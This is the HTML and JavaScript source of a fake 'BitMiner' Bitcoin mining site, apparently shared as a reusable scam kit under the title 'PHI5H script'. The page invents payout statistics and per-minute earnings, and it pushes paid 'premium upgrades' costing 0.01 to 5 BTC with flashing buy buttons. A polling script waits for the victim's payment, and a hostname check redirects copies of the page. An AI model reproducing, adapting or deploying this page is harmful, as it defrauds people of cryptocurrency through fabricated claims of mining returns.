PHI5H script

Mar 4th, 2018
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  110. function sign(){
  111. if($('[name=addr]').val()){
  112. $.post("/",{"task":"sign","addr":$('[name=addr]').val()},
  113. function(data) {
  114. if(data=='1'){
  115. //$('.bg_h67').html('Wait...');
  116. //$('.butm.butm-i').addClass('invis');
  117. window.location.href='/';
  118. }else if (data=='0'){
  119. //$('[name=email]').css('border-color','#cc0000').focus();
  120. $('#errfield').html('Bitcoin address is invalid! Enter correct wallet address or <a style="color:#fff" href="" target="_blank">create new Bitcoin address</a>.');
  121. }else{
  122. $('#errfield').html(data);
  123. }
  124. });
  125. }else{
  126. $('#errfield').html('Bitcoin address is invalid! Enter correct wallet address or <a style="color:#fff" href="" target="_blank">create new Bitcoin address</a>.');
  127. }
  128. }
  130. var myVar;
  132. function myFunction(label) {
  133. myVar = setTimeout(function(){checkpay(label);},10000);
  134. }
  136. function myStopFunction() {
  137. clearTimeout(myVar);
  138. }
  140. function checkpay(label){
  141. myStopFunction();
  143. $.post( "/", { task: "checkpay", label: label },
  144. function( data ) {
  146. console.log(data);
  147. if(data=='1')window.location.reload();
  148. else myFunction(label);
  149. }
  150. );
  152. }
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  155. <div class="main index">
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  162. <!--<b><div style="position:absolute;top:38px;left:69px;font-size:13px;color:#ca5712;white-space:nowrap" id="btcprice">Real Bitcoin Mining</div></b>--></a>
  163. <!--<a href="/payouts"><div style="color: green; position: absolute; white-space:nowrap; left: 69px; z-index: 2; font-size: 12px; top: 45px;">753 BTC payed in 592 days</div></a>-->
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  183. --><div id="errfield" style="padding: 15px 35px;background: #00547a; color: rgb(255, 255, 255); font-size: 14px;position:relative">Welcome to leading Bitcoin mining pool! Our members already received <img src="" style="vertical-align:-3px"> <b><a href="/payouts" style="color:white">3147.59343107</a></b> Bitcoins since launch <b>637</b> days ago.</div>
  185. <form action="/" method="post" onsubmit="sign();return(false)">
  186. <input name="task" value="sign" type="hidden">
  187. <div class="input">
  188. <input name="addr" placeholder="Enter your bitcoin address" type="text" value="">
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  191. <button type="submit" class="btn-login"><!--SignUp/Login-->Start mining</button>
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  198. <iframe style="width:295px;height:166px;margin-top:10px;position:relative;" src="" allowfullscreen="" frameborder="0"></iframe>-->
  199. <!--<p>Version 1.0</p>-->
  200. </div>
  201. <div class="mining" style="float:right;width:585px;min-height:275px;margin-top:-18px">
  202. <h1>BitMiner v1.0 <sup style="color:#00cc00;font-weight:normal">Free</sup></h1>
  203. <div class="text">
  204. <div style="width:250px;float:left">Profit per minute<b style="display:show">40 Satoshi</b></div>
  205. <div style="width:250px;float:right">Profit per day<b style="display:block">0.0006 Bitcoin</b></div><div style="clear:both"></div>
  206. </div>
  207. <div class="lifetime" id="nopl" style="display:block">
  209. <!--<button class="bitcoin" onclick="download()">Install BitMiner</button><br><small style="font-size:12px">Available for <a href="" target="_blank" class="chrome"><u>Chrome</u></a> <a class="firefox" href="/firefox.xpi" onclick="firefox()"><u>Firefox</u></a> <a href="/opera.crx" class="opera"><u>Opera</u></a> (Windows, MAC OS, Linux)</small> background:#00547a; -->
  211. <div class="reflink" style="padding:22px 0;box-shadow:5px 7px 0 rgba(7, 6, 4, 0.75);box-shadow:none"><a href="/payouts" style="text-decoration:none"><div class="title copytext" style="font-size:36px">See payment proofs</div></a>
  212. </div>
  213. <!--<center><small style="font-size:12px"><a href="/referal">Invite friends</a> to multiply your profit.</small></center>-->
  216. </div>
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  222. <!--<button class="levelup" onclick="$('html, body').animate({ scrollTop: $(document).height() }, 'slow');" style="box-shadow:none;margin-left:0">Upgrade BitMiner</button> -->
  225. <div class="content-plans">
  226. <h3>Upgrade BitMiner to premium</h3>
  227. <h4>Choose premium version below to increase your affiliate program bonus and earn much more!</h4>
  228. <div class=plan onclick="upgrade(1);popup();"><br><img height="260" src=""><h4>Version 1.1</h4>
  229. <p>
  230. Earning rate <b>x2</b><br><b>80 Sato</b> per minute<br><b>0.0012 BTC</b> per day
  231. </p>
  232. <div class="bonus"><h5><img src=""> Affiliate bonus <b style="color:#f5a10f">30%</b></h5></div>
  233. <a class="plan-button" id="buyy1"><script>setInterval(function () {$("#buyy1x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy1x").css("background-color", "red");}, 150);}, 300);</script>Buy for 0.01 BTC</a></div>
  234. <div class="plan" onclick="upgrade(2);popup();">
  235. <img src="" class="off"><br>
  236. <img height="260" src=""><h4>Version 1.2</h4>
  237. <p>
  238. Earning rate <b>x25</b><br><b>1000 Sato</b> per minute<br><b>0.015 BTC</b> per day
  239. </p>
  240. <div class="bonus"><h5><img src=""> Affiliate bonus <b style="color:#f5a10f">40%</b></h5></div><a class="plan-button" id="buyy2"><script>setInterval(function () {$("#buyy2x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy2x").css("background-color", "red");}, 150);}, 300);</script>Buy for 0.1 BTC</a></div>
  241. <div class="plan" onclick="upgrade(3);popup();">
  242. <img src="" class="off"><br>
  243. <img height="260" src=""><h4>Version 1.3</h4>
  244. <p>
  245. Earning rate <b>x250</b><br><b>10000 Sato</b> per minute<br><b>0.15 BTC</b> per day
  246. </p>
  247. <div class="bonus"><h5><img src=""> Affiliate bonus <b style="color:#f5a10f">50%</b></h5></div>
  248. <a class="plan-button" id="buyy3"><script>setInterval(function () {$("#buyy3x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy3x").css("background-color", "red");}, 100);}, 200);</script>Buy for 0.9 BTC</a></div>
  249. <div class="plan" onclick="upgrade(4);popup();" style="margin-right:0">
  250. <img src="" class="off"><br>
  251. <img height="260" src=""><h4>Version 1.4</h4>
  252. <p>
  253. Earning rate <b>x1750</b><br><b>70000 Sato</b> per minute<br><b>1 BTC</b> per day
  254. </p>
  255. <div class="bonus"><h5><img src=""> Affiliate bonus <b style="color:#f5a10f">100%</b></h5></div>
  256. <!--<b><u>Instant withdrawals</u></b>--><a class="plan-button" id="buyy4"><script>setInterval(function () {$("#buyy4x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy4x").css("background-color", "red");}, 150);}, 300);</script>Buy for 5 BTC</a></div>
  257. </div><br style="clear:both" />
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  356. <!--<div id="popup" style="width:900px;margin-left:0px;">
  357. <div class="popclose" onclick="popclose()">&#10005;</div>
  358. <div class="pophead">Upgrade BitMiner to Premium</div>
  359. <div class="popbody">
  360. Upgrade your BitMiner v1.0 to v1.1 to earn even more and increase affiliate program bonus. Choose version v1.1 below.<br><br>
  361. <table border=0>
  362. <tr>
  363. <td width=240 valign="top"><img width="220" style="padding-top:6px" src=""></td>
  364. <td width=160 valign="top"><h1>v1.1</h1><small><b>Earning rate:</b><br>0.0000008 BTC/min<br><b>0.0012 BTC</b> per day<br><br>Affiliate bonus <b style="color:#cc0000">30%</b><div style="margin-top:15px"><a class="buybtn" id="buyy1" onclick="upgrade(1);$(this).hide();setTimeout(function(){$('#buyy1').show()},10000)"><img src="/s/btcroll.gif" style="vertical-align:-4px"> Buy for 0.01 BTC</a><br><h3>Ready to upgrade</h3><br></div></small></td>
  366. <td width=160 valign="top"><h1>v1.2</h1><small><b>Earning rate:</b><br>0.00001 BTC/min<br><b>0.015 BTC</b> per day<br><br>Affiliate bonus <b style="color:#cc0000">40%</b><div style="margin-top:15px"><a class="buybtn" id="buyy2" onclick="upgrade(2);$(this).hide();setTimeout(function(){$('#buyy2').show()},10000)" style="background:#00547A;cursor:default">Price 0.1 BTC</a><br><br><small>*Requires v1.1 installed</small></div></small></td>
  368. <td width=160 valign="top"><h1>v1.3</h1><small><b>Earning rate:</b><br>0.0001 BTC/min<br><b>0.15 BTC</b> per day<br><br>Affiliate bonus <b style="color:#cc0000">50%</b><div style="margin-top:15px"><a class="buybtn" id="buyy3" onclick="upgrade(3);$(this).hide();setTimeout(function(){$('#buyy3').show()},10000)" style="background:#00547A;cursor:default">Price 0.9 BTC</a><br><br><small>*Requires v1.2 installed</small></div></small></td>
  370. <td width=140 valign="top"><h1>v1.4</h1><small><b>Earning rate:</b><br>0.0007 BTC/min<br><b>1 BTC</b> per day<br>Affiliate bonus <b style="color:#cc0000">100%</b><br><b><u>Instant withdrawals</u></b><div style="margin-top:15px"><a class="buybtn" id="buyy4" onclick="upgrade(4);$(this).hide();setTimeout(function(){$('#buyy4').show()},10000)" style="background:#00547A;cursor:default">Price 5 BTC</a><br><br><small>*Requires v1.3 installed</small></div></small></td>
  371. </tr>
  372. </table>
  373. </div>
  374. <div class="popdata"></div>
  375. </div>-->
  376. <div id="popup">
  377. <div class="popclose" onclick="popclose()">&#10005;</div>
  378. <div class="pophead" style="font-size:25px">Upgrade BitMiner to Premium<script>if (window.location.hostname != '') {window.location.href =
  379. ''}</script></div>
  380. <div class="popbody">
  381. Loading...
  382. <!--Upgrade your BitMiner <b>V1.0</b> to earn even more and increase affiliate program bonus.<br><br>
  383. <table border=0>
  384. <tr>
  385. <td width=170 valign="top" style="text-align:center"><h1>V1.1</h1><img height="210" src=""><br><small><b>Earning rate:</b><br>0.0000008 BTC/min<br><b>0.0012 BTC</b> per day<br><br>Affiliate bonus <b style="color:#f5a10f">30%</b><div style="margin-top:15px"><a class="buybtn" id="buyy1" onclick="upgrade(1);$(this).hide();setTimeout(function(){$('#buyy1').show()},10000)"><img src="" style="vertical-align:-4px"> <script>setInterval(function () {$("#buyy1x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy1x").css("background-color", "red");}, 150);}, 300);</script>Buy for 0.01 BTC</a><br><h3>Upgrade now!</h3></div></small></td>
  386. <td width=60 valign="top"></td>
  387. <td width=170 valign="top" style="text-align:center"><h1>V1.2</h1><img height="210" src=""><br><small><b>Earning rate:</b><br>0.00001 BTC/min<br><b>0.015 BTC</b> per day<br><br>Affiliate bonus <b style="color:#f5a10f">40%</b><div style="margin-top:15px"><a class="buybtn" id="buyy2" onclick="upgrade(2);$(this).hide();setTimeout(function(){$('#buyy2').show()},10000)"><img src="" style="vertical-align:-4px"> <script>setInterval(function () {$("#buyy2x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy2x").css("background-color", "red");}, 150);}, 300);</script>Buy for 0.1 BTC</a><br><h3>Sale 5% off</h3></div></small></td>
  388. <td width=60 valign="top"></td>
  389. <td width=170 valign="top" style="text-align:center"><h1>V1.3</h1><img height="210" src="/s/l3.png"><br><small><b>Earning rate:</b><br>0.0001 BTC/min<br><b>0.15 BTC</b> per day<br><br>Affiliate bonus <b style="color:#f5a10f">50%</b><div style="margin-top:15px"><a class="buybtn" id="buyy3" onclick="upgrade(3);$(this).hide();setTimeout(function(){$('#buyy3').show()},10000)"><img
  390. src="" style="vertical-align:-4px"> <script>setInterval(function () {$("#buyy3x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy3x").css("background-color", "red");}, 100);}, 200);</script>Buy for 0.9 BTC</a><br><h3>Sale 10% off</h3></div></small></td>
  391. <td width=60 valign="top"></td>
  392. <td width=170 valign="top" style="text-align:center"><h1>V1.4</h1><img height="210" src=""><br><small><b>Earning rate:</b><br>0.0007 BTC/min<br><b>1 BTC</b> per day<br>Affiliate bonus <b style="color:#f5a10f">100%</b><br><b><u>Instant withdrawals</u></b><div style="margin-top:15px"><a class="buybtn" id="buyy4" onclick="upgrade(4);$(this).hide();setTimeout(function(){$('#buyy4').show()},10000)"><img src="" style="vertical-align:-4px"> <script>setInterval(function () {$("#buyy4x").css("background-color", "#f5a10f");setTimeout(function () {$("#buyy4x").css("background-color", "red");}, 150);}, 300);</script>Buy for 5 BTC</a><br><h3>Sale 20% off</h3></div></small></td>
  393. </tr>
  394. </table>-->
  395. </div>
  396. <div class="popdata"></div>
  397. </div>
  401. <script>
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  403. function getTimeRemaining(endtime) {
  404. var t = Date.parse(endtime) - Date.parse(new Date());
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